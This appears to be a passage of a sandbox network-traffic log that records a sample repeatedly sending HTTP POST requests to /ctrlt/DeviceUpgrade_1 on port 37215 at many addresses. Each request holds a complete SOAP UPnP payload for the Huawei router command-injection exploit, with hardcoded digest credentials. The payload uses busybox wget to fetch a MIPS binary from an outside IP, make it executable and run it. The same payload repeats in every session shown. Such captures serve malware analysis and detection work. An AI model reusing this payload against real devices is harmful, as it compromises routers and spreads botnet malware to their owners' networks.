                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            162192.168.2.1339324156.211.48.7637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.008064032 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            163192.168.2.133660841.223.243.3537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.008956909 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            164192.168.2.133296641.45.237.9637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.009869099 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            165192.168.2.135496441.58.54.5837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.010669947 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            166192.168.2.134389641.186.220.17837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.011379004 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            167192.168.2.1350268197.128.25.11937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.012098074 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            168192.168.2.1349156156.245.237.25037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.012794018 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            169192.168.2.1352976197.57.169.8637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.013509035 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            170192.168.2.135636041.241.121.24837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.014209986 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            171192.168.2.1338984156.122.137.9837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.014910936 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 